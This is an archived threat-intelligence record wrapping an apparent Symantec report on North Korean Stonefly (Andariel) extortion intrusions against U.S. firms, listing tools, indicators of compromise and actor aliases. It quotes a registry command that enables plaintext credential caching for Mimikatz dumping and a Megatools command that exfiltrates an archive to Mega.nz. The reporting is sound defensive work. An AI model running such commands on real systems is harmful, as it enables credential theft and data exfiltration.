{
	"id": "aa2027da-c5a3-4090-a396-60256fd92188",
	"created_at": "2026-04-06T00:11:47.739815Z",
	"updated_at": "2026-04-10T03:34:54.42768Z",
	"deleted_at": null,
	"sha1_hash": "83ff54e4aff9baaf784d2c76111733343ff81c68",
	"title": "Stonefly: Extortion Attacks Continue Against U.S. Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 66284,
	"plain_text": "Stonefly: Extortion Attacks Continue Against U.S. Targets\r\nArchived: 2026-04-05 21:19:10 UTC\r\nSymantec’s Threat Hunter Team has found evidence that the North Korean Stonefly group (aka Andariel, APT45,\r\nSilent Chollima, Onyx Sleet) is continuing to mount financially motivated attacks against organizations in the\r\nU.S., despite being the subject of an indictment and a multi-million dollar reward.\r\nSymantec, part of Broadcom, found evidence of intrusions against three different organizations in the U.S. in\r\nAugust of this year, a month after the indictment was published. While the attackers didn’t succeed in deploying\r\nransomware on the networks of any of the organizations affected, it is likely that the attacks were financially\r\nmotivated. All the victims were private companies and involved in businesses with no obvious intelligence value. \r\nAttribution\r\nIn several of the attacks, Stonefly’s custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed. This tool\r\nis exclusively associated with the group. In addition to this, several Stonefly indicators of compromise recently\r\ndocumented by Microsoft were found on the compromised networks. The attackers used a fake Tableau certificate\r\ndocumented by Microsoft in addition to two other certificates (see Indicators of Compromise) that appear to be\r\nunique to this campaign. \r\nToolset\r\nPreft: Multi-stage backdoor capable of downloading and uploading files, executing commands, and downloading\r\nadditional plugins. Preft can support multiple plugin types, including executable files, VBS, BAT, and shellcode. It\r\nhas multiple persistence modes, including Startup_LNK, Service, Registry, and Task Scheduler. 
\r\nNukebot: Backdoor capable of executing commands, downloading and uploading files, and taking screenshots.\r\nNukebot has not been associated with Stonefly before; however, its source code was leaked and this is likely how\r\nStonefly obtained the tool.\r\nBatch files: The attackers used a malicious batch file to enable plaintext credentials, modifying the registry to\r\nadd:\r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d\r\n1\r\nMimikatz (see below) was then executed to dump credentials.\r\nMimikatz: Publicly available credential dumping tool. The attackers used a custom variant of the tool that writes\r\nharvested credentials to the file C:\\Windows\\Temp\\KB0722.log. A similar custom variant of Mimikatz found on\r\nVirusTotal was linked by Mandiant to Stonefly.\r\nhttps://www.security.com/threat-intelligence/stonefly-north-korea-extortion\r\nPage 1 of 4\n\nKeyloggers: The attackers deployed two distinct keyloggers in their attacks: \r\nThe first (SHA256: 485465f38582377f9496a6c77262670a313d8c6e01fd29a5dbd919b9a40e68d5) was a\r\nkeylogger capable of stealing data from the clipboard. In addition to this, it logs when a program starts and\r\ncaptures which program’s keystrokes are input. Data captured is logged in a file named 0.log, which is\r\narchived into a ZIP archive named as a TMP file in the temporary directory with the password\r\nPass@w0rd#384.\r\nThe second (SHA256: d867aaa627389c377a29f01493e9dff517f30db8441bf2ccc8f80c48eaa0bf91) was a\r\nkeylogger capable of stealing data from the clipboard. It logs stolen data into a randomly named DAT file\r\nin the temporary directory. \r\nSliver: Open-source cross-platform penetration testing framework.\r\nChisel: Open-source proxy tool. 
It creates a TCP/UDP tunnel that is transported over HTTP and secured via SSH.\r\nPuTTY: Publicly available SSH client.\r\nPlink: A command-line connection tool for PuTTY.\r\nMegatools: A command-line client for the Mega.nz cloud storage service. Megatools was used to perform data\r\nexfiltration:\r\nCSIDL_WINDOWS\\temp\\mt.exe put -u [REMOVED] -p [REMOVED] CSIDL_WINDOWS\\temp\\sig.rar /Root  \r\nSnap2HTML: Publicly available tool that takes snapshots of folder structures on a hard drive and saves them as\r\nHTML files.\r\nFastReverseProxy (FRP): Open-source tool to expose local servers to the public internet.\r\nBackground\r\nOn July 25, 2024, the U.S. Justice Department indicted a North Korean man named Rim Jong Hyok on charges\r\nrelated to the attack campaign. Rim is alleged to be a member of the Stonefly group, which is linked to the North\r\nKorean military intelligence agency, the Reconnaissance General Bureau (RGB). \r\nHe was charged with being involved in extorting U.S. hospitals and other healthcare providers between 2021 and\r\n2023, laundering the ransom proceeds, and then using these proceeds to fund additional cyberattacks against\r\ntargets in the defense, technology, and government sectors worldwide. Targets of these follow-on attacks included\r\ntwo U.S. Air Force bases, NASA-OIG, and organizations located in Taiwan, South Korea, and China. In addition\r\nto the indictment, the U.S. Department of State offered a reward of up to $10 million for information on his\r\nlocation or identification.\r\nStonefly first came to notice in July 2009, when it mounted distributed denial-of-service (DDoS) attacks against a\r\nnumber of South Korean, U.S. 
government, and financial websites.\r\nIt reappeared in 2011, when it launched more DDoS attacks, but also revealed an espionage element to its\r\nattacks when it was found to be using a sophisticated backdoor Trojan (Backdoor.Prioxer) against selected targets.\r\nIn March 2013, the group was linked to the Jokra (Trojan.Jokra) disk-wiping attacks against a number of South\r\nKorean banks and broadcasters. Three months later, the group was involved in a string of DDoS attacks against\r\nSouth Korean government websites.\r\nIn recent years, the group’s capabilities have grown markedly and, since at least 2019, Symantec has seen its focus\r\nshift mainly to espionage operations against select, high-value targets. It appears to specialize in targeting\r\norganizations that hold classified or highly sensitive information or intellectual property. While other North\r\nKorean groups are well known for mounting financial attacks driven by the need to raise foreign currency for the\r\nregime, Stonefly had until recent years appeared not to be involved in financially motivated attacks. 
\r\nUndeterred\r\nWhile Stonefly’s move into financially motivated attacks is a relatively recent development, the spotlight shone on\r\nthe group’s activities due to the indictment naming one of its members has not yet led to a cessation of activity.\r\nThe group is likely continuing to attempt to mount extortion attacks against organizations in the U.S.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nCertificate 1\r\nthumbprint = \"313cffaac3d1576ca3c1cee8f9a68a15a24ff418\"\r\nissuer = \"/CN=Baramundi Inc.\"\r\nsubject = \"/CN=Baramundi Inc.\"\r\nversion = 3\r\nalgorithm = \"sha1WithRSA\"\r\nalgorithm_oid = \"1.3.14.3.2.29\"\r\nserial = \"af:6d:f9:f9:69:86:58:80:49:1e:2b:ae:20:9f:0d:12\"\r\nnot_before = 1683852503\r\nnot_after = 2208988799\r\nverified = 1\r\ndigest_alg = \"sha1\"\r\ndigest = \"efe03d9be2cd148594e5fcb7272a40b85e33d2bf\"\r\nfile_digest = \"efe03d9be2cd148594e5fcb7272a40b85e33d2bf\"\r\nnumber_of_certificates = 1\r\nCertificate 2\r\nthumbprint = \"10b8b939400a59d2cb79fff735796d484394f8dd\"\r\nissuer = \"/CN=VEXIS SOFTWARE LTD.\"\r\nsubject = \"/CN=VEXIS SOFTWARE LTD.\"\r\nversion = 3\r\nalgorithm = \"sha1WithRSA\"\r\nalgorithm_oid = \"1.3.14.3.2.29\"\r\nserial = \"bc:bf:05:4e:a8:b2:69:be:4c:c9:04:f0:8d:f9:eb:97\"\r\nnot_before = 1710348691\r\nnot_after = 2208988799\r\nverified = 1\r\ndigest_alg = \"sha1\"\r\ndigest = \"b9b5d20438cf54acf33ee5731dc283554b8a044c\"\r\nfile_digest = \"b9b5d20438cf54acf33ee5731dc283554b8a044c\"\r\nnumber_of_certificates = 1\r\nSource: https://www.security.com/threat-intelligence/stonefly-north-korea-extortion",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.security.com/threat-intelligence/stonefly-north-korea-extortion"
	],
	"report_names": [
		"stonefly-north-korea-extortion"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "88bd3777-de28-4ed2-a994-e38275333256",
			"created_at": "2024-07-28T02:00:04.697991Z",
			"updated_at": "2026-04-10T02:00:03.683368Z",
			"deleted_at": null,
			"main_name": "APT45",
			"aliases": [],
			"source_name": "MISPGALAXY:APT45",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434307,
	"ts_updated_at": 1775792094,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/83ff54e4aff9baaf784d2c76111733343ff81c68.pdf",
		"text": "https://archive.orkl.eu/83ff54e4aff9baaf784d2c76111733343ff81c68.txt",
		"img": "https://archive.orkl.eu/83ff54e4aff9baaf784d2c76111733343ff81c68.jpg"
	}
}